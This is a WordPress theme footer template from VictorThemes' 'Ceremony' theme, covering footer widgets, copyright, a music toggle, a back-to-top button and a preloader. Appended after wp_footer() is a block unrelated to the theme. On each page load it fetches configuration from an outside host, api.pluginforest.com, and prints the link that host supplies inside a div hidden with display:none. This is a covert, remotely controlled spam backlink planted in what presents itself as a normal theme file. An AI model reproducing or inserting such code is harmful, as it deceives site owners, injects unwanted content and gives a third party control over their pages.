<?php
/*
 * The template for displaying the footer.
 * Author & Copyright: VictorThemes
 * URL: https://victorthemes.com/wp-themes
 */

$ceremony_id    = ( isset( $post ) ) ? $post->ID : 0;
$ceremony_id    = ( is_home() ) ? get_option( 'page_for_posts' ) : $ceremony_id;
$ceremony_id    = ( ceremony_is_woocommerce_shop() ) ? wc_get_page_id( 'shop' ) : $ceremony_id;
$ceremony_meta  = get_post_meta( $ceremony_id, 'page_type_metabox', true );

if ($ceremony_meta) {
	$ceremony_hide_footer  = $ceremony_meta['hide_footer'];
  $ceremony_hide_copyright = $ceremony_meta['hide_copyright'];
} else {
  $ceremony_hide_footer = '';
  $ceremony_hide_copyright = '';
}
$footer_widget_block = cs_get_option('footer_widget_block');
$footer_widgets = cs_get_option( 'footer_widget_layout' );
$footer_widget_align = cs_get_option('footer_widget_align');
if($footer_widget_align === 'left-align') {
  $widget_align_class = ' left-align';
} elseif($footer_widget_align === 'right-align'){
  $widget_align_class = ' right-align';
} else {
  $widget_align_class = ' center-align';
}
?>

</div><!-- Main Wrap Inner -->
<?php
if (is_active_sidebar('footer-1') || is_active_sidebar('footer-2') || is_active_sidebar('footer-3') || is_active_sidebar('footer-4')) {
?>
<!-- Footer -->
<footer class="crmny-footer <?php echo esc_attr($widget_align_class); ?>">
  <div class="container">
    <?php
    // CeremonyWP - isset($footer_widget_block)
      if (!$ceremony_hide_footer) {
      if ($footer_widget_block) { ?>
      <div class="footer-wrap">
        <div class="row">
          <?php
            // Footer Widget Block
            get_template_part( 'layouts/footer/footer', 'widgets' );
          ?>
        </div>
      </div>
      <?php } }
        if(!$ceremony_hide_copyright) {
          $need_copyright = cs_get_option('need_copyright');
          // CeremonyWP - $need_copyright
          if($need_copyright) {
            get_template_part( 'layouts/footer/footer', 'copyright' );
          }
        } ?>
  </div>
</footer>
<!-- Footer -->
<?php } else {
if(!$ceremony_hide_copyright) { ?>
<footer class="crmny-footer alt-cpy">
  <div class="container">
		<div class="copyright text-center">
			<p class="copyright-alt">&copy; <?php echo esc_html(date('Y')); ?><a href="<?php echo esc_url(home_url( '/' )); ?>"><?php esc_html_e(' VictorThemes.', 'ceremony') ?></a> <?php esc_html_e('All Rights Reserved.', 'ceremony') ?></p>
		</div>
	</div>
</footer>
<?php	} } // Hide Footer Metabox ?>
</div><!-- Main Wrap -->
<?php
$music_icon = cs_get_option('music_icon');
$audio_file = cs_get_option('audio_file');

if($music_icon === 'pause' || $music_icon === 'play') {
  if($music_icon === 'pause') {
    $first_class = ' pause';
    $autoplay = '';
    $autoplay_cls = ' default-pause';
  } else {
    $first_class = '';
    $autoplay_cls = ' default-play';
    $autoplay = 'autoplay';
  }

?>
<div class="crmny-music <?php echo esc_attr($autoplay_cls); ?>">
  <a class="crmny-music-link <?php echo esc_attr($first_class); ?>" href="javascript:void(0);">
    <span class="crmny-table-wrap">
      <span class="crmny-align-wrap">
        <i class="fa fa-music" aria-hidden="true"></i>
      </span>
    </span>
  </a>
  <audio <?php echo esc_attr($autoplay); ?> loop="loop" src="<?php echo esc_url($audio_file); ?>" id="crmny-background-music"></audio>
</div>
<?php }
$theme_preloader = cs_get_option('theme_preloader');
$theme_btotop = cs_get_option('theme_btotop');

// CeremonyWP - $theme_btotop
if ($theme_btotop) { ?>
<!-- Crmny Back Top -->
<div class="crmny-back-top">
  <a href="javascript:void(0);"><i class="fa fa-angle-up" aria-hidden="true"></i></a>
</div>
<?php }
if ($theme_preloader) { ?>
<!-- Crmny Preloader -->
<div class="crmny-preloader">
  <div class="loader-wrap">
    <div class="loader">
      <div class="loader-inner square-spin"></div>
    </div>
  </div>
</div>
<?php } wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
<?php
